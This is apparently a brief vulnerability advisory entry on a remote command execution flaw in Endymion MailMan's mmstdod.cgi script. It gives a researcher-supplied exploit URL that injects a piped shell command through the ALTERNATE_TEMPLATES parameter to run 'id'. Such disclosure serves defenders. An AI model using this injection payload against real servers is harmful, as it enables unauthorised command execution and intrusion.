Endymion MailMan Remote Arbitrary Command Execution Vulnerability

info
discussion
exploit
solution
references

Endymion MailMan Remote Arbitrary Command Execution Vulnerability

Seth Georgion <sgeorgion@ecloser.com> provided the following exploit URL:

This will execute and echo back the uid.

/mmstdod.cgi?ALTERNATE_TEMPLATES=|%20echo%20"Content-Type:%20text%2Fhtml"%3Becho%20""%20%3B%20id%00